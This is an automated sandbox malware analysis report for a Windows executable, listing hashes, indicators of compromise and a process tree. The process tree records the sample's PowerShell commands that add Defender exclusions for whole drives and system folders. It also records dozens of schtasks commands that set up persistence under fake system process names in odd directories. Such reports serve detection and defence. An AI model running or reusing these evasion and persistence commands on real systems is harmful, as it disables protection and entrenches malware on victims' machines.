6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6

Analysis

max time kernel
102s
max time network
122s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
10-02-2023 10:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
Size

2.3MB
MD5

2bf6abda97d1e5460b69e1b86bc21fb8
SHA1

712884175ccd13f72ea0f67d7ae293ccbd55ca10
SHA256

6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6
SHA512

dd990825e5ff65b53b828ba5976c5499780d3d94fc4c39260aa3c738d6fd02b97f8ea5585ba7a72a4131e5e38c3fb87b7aeaa4c66702ca77bac6b8fd2a31ffc7
SSDEEP

24576:fsuSTCERnVt1Jv5g17IP7hBjIHkC9j1P+5CT3slE4JpF8Z8xA35E0LQcJsw7AFS:QVX8Hj1gJc6x0dLQcV9OL2i++

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 51 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1336	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	612	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1148	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	280	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1792	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1552	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	296	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1472	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1440	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1860	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1616	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1448	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	300	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	696	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1532	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	632	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	844	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	924	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	900	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1424	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2000	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2060	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2108	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2152	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2180	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2252	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2320	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2388	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2416	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2440	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2464	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	1656	schtasks.exe	28
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2536	1656	schtasks.exe	28

.NET Reactor proctector 4 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1776-54-0x0000000001100000-0x0000000001360000-memory.dmp	net_reactor
behavioral1/files/0x0006000000014371-99.dat	net_reactor
behavioral1/files/0x0006000000014371-102.dat	net_reactor
behavioral1/memory/2604-104-0x0000000001340000-0x00000000015A0000-memory.dmp	net_reactor

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com
12	ip-api.com

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files\Uninstall Information\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\csrss.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Windows Portable Devices\csrss.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Windows Portable Devices\886983d96e3d3e	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files\Uninstall Information\f3b6ecef712a24	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\it-IT\Idle.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Program Files (x86)\Common Files\SpeechEngines\WMIADAP.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Common Files\SpeechEngines\WMIADAP.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Program Files\Uninstall Information\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Windows Sidebar\it-IT\Idle.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Windows Sidebar\it-IT\6ccacd8608530f	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\f3b6ecef712a24	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Program Files (x86)\Common Files\SpeechEngines\75a57c1bdf437c	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Program Files (x86)\Windows Portable Devices\csrss.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\it-IT\b75386f1303e64	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Windows\Prefetch\ReadyBoot\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Windows\it-IT\taskhost.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Windows\it-IT\taskhost.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File opened for modification	C:\Windows\es-ES\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Windows\es-ES\f3b6ecef712a24	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Windows\Prefetch\ReadyBoot\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Windows\Prefetch\ReadyBoot\f3b6ecef712a24	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
File created	C:\Windows\es-ES\spoolsv.exe	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe

Creates scheduled task(s) 1 TTPs 51 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2344	schtasks.exe
2464	schtasks.exe
1860	schtasks.exe
1448	schtasks.exe
1772	schtasks.exe
1584	schtasks.exe
2252	schtasks.exe
2292	schtasks.exe
2368	schtasks.exe
2388	schtasks.exe
1616	schtasks.exe
696	schtasks.exe
844	schtasks.exe
2204	schtasks.exe
2228	schtasks.exe
2320	schtasks.exe
1592	schtasks.exe
300	schtasks.exe
1532	schtasks.exe
900	schtasks.exe
2000	schtasks.exe
632	schtasks.exe
924	schtasks.exe
2084	schtasks.exe
1552	schtasks.exe
296	schtasks.exe
1472	schtasks.exe
1944	schtasks.exe
1700	schtasks.exe
2508	schtasks.exe
2132	schtasks.exe
2440	schtasks.exe
612	schtasks.exe
280	schtasks.exe
1692	schtasks.exe
1688	schtasks.exe
2108	schtasks.exe
1792	schtasks.exe
2152	schtasks.exe
2492	schtasks.exe
1148	schtasks.exe
1440	schtasks.exe
2536	schtasks.exe
2180	schtasks.exe
2276	schtasks.exe
2416	schtasks.exe
1336	schtasks.exe
876	schtasks.exe
1424	schtasks.exe
1992	schtasks.exe
2060	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 1776 wrote to memory of 2980	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	80
PID 1776 wrote to memory of 2980	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	80
PID 1776 wrote to memory of 2980	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	80
PID 1776 wrote to memory of 2992	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	84
PID 1776 wrote to memory of 2992	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	84
PID 1776 wrote to memory of 2992	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	84
PID 1776 wrote to memory of 3004	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	83
PID 1776 wrote to memory of 3004	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	83
PID 1776 wrote to memory of 3004	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	83
PID 1776 wrote to memory of 3032	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	89
PID 1776 wrote to memory of 3032	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	89
PID 1776 wrote to memory of 3032	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	89
PID 1776 wrote to memory of 3048	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	88
PID 1776 wrote to memory of 3048	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	88
PID 1776 wrote to memory of 3048	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	88
PID 1776 wrote to memory of 2076	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	86
PID 1776 wrote to memory of 2076	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	86
PID 1776 wrote to memory of 2076	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	86
PID 1776 wrote to memory of 2192	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	91
PID 1776 wrote to memory of 2192	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	91
PID 1776 wrote to memory of 2192	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	91
PID 1776 wrote to memory of 2244	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	101
PID 1776 wrote to memory of 2244	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	101
PID 1776 wrote to memory of 2244	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	101
PID 1776 wrote to memory of 2284	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	99
PID 1776 wrote to memory of 2284	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	99
PID 1776 wrote to memory of 2284	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	99
PID 1776 wrote to memory of 2432	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	97
PID 1776 wrote to memory of 2432	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	97
PID 1776 wrote to memory of 2432	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	97
PID 1776 wrote to memory of 2524	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	95
PID 1776 wrote to memory of 2524	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	95
PID 1776 wrote to memory of 2524	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	95
PID 1776 wrote to memory of 1096	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	93
PID 1776 wrote to memory of 1096	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	93
PID 1776 wrote to memory of 1096	1776	6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe	93

C:\Users\Admin\AppData\Local\Temp\6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe
"C:\Users\Admin\AppData\Local\Temp\6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe"
1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  PID:2980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  PID:3004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  PID:2992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  PID:2076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
  2⤵
  PID:3032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  PID:2192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  PID:1096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  PID:2524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  PID:2284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  PID:2244
- C:\Windows\it-IT\taskhost.exe
  "C:\Windows\it-IT\taskhost.exe"
  2⤵
  PID:2604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Windows\es-ES\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\es-ES\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\es-ES\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Sidebar\it-IT\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\it-IT\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\it-IT\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae66" /sc MINUTE /mo 6 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6" /sc ONLOGON /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae66" /sc MINUTE /mo 12 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\6d337ecc9d8dd809330cfdc244fae658d5cc795ce2aad2f2390e2983f5d1fae6.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ad6fdfc2-6219-11ed-a572-5e34c4ab0fa3\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584

C:\Windows\system32\schtasks.exe
